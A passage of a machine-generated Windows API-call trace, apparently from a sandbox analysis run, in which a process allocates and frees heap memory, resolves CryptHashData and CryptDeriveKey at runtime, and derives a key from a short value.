4 [0235.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0235.787] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e55098, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0235.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0235.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0235.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0235.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0235.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0235.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0235.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e55048 [0235.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0235.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0235.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977de8 | out: hHeap=0x970000) returned 1 [0235.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0235.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0235.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0235.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0235.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0235.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0235.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0235.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0235.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0235.788] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0235.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0235.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0235.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0235.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0235.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04508 [0235.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0235.788] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0235.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04508 | out: hHeap=0x970000) returned 1 [0235.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0235.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e511a8 [0235.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0235.788] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0235.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0235.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0235.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0235.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0235.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0235.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0235.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0235.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0235.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0235.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0235.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0235.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0235.789] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0235.789] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0235.789] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e51550, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0235.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0235.790] GetProcAddress (hModule=0x756e0000, lpProcName="CryptHashData") returned 0x756feef0 [0235.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0235.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0235.790] CryptHashData (hHash=0xa87250, pbData=0x2e55058, dwDataLen=0x3, dwFlags=0x1) returned 1 [0235.790] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0235.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0235.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0235.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0235.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c08 [0235.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0235.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0235.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0235.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0235.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0235.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0235.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b08 [0235.791] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0235.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b08 | out: hHeap=0x970000) returned 1 [0235.791] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0235.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0235.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0235.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0235.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0235.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f043b8 [0235.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0235.791] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0235.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f043b8 | out: hHeap=0x970000) returned 1 [0235.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0235.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e513e8 [0235.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0235.791] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0235.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0235.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0235.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0235.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0235.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0235.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0235.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0235.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0235.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0235.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0235.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0235.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0235.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0235.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0235.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0235.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0235.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0235.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0235.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0235.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f7d8 [0235.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0235.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0235.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0235.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f648 [0235.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0235.792] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0235.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f648 | out: hHeap=0x970000) returned 1 [0235.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0235.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51598 [0235.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0235.793] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0235.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0235.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0235.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0235.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0235.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0235.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0235.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0235.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0235.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0235.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0235.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0235.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0235.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0235.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0235.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0235.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0235.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0235.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0235.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0235.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f7d8 | out: hHeap=0x970000) returned 1 [0235.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0235.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0235.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0235.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0235.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0235.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0235.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0235.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0235.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0235.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0235.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0235.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0235.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0235.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0235.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0235.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0235.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0235.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0235.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0235.795] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0235.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0235.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0235.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0235.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0235.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0235.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0235.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0235.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0235.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0235.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0235.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0235.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0235.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0235.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0235.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0235.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0235.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0235.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0235.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0235.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0235.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0235.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0235.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0235.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0235.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0235.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0235.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0235.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0235.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0235.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0235.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0235.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0235.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0235.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0235.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0235.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0235.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0235.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0235.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0235.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0235.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0235.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0235.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0235.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0235.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0235.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f4e0 [0235.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0235.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0235.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0235.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0235.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0235.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0235.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0235.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0235.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0235.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0235.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0235.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0235.798] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0235.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e51598 [0235.798] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e51598, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0235.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0235.798] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDeriveKey") returned 0x75712c90 [0235.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0235.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0235.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a68 [0235.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0235.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0235.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0235.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0235.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0235.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0235.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0235.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0235.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0235.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0235.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0235.799] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa87250, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa872d0) returned 1 [0235.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0235.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0235.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0235.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0235.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0235.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0235.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0235.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0235.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0235.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0235.799] 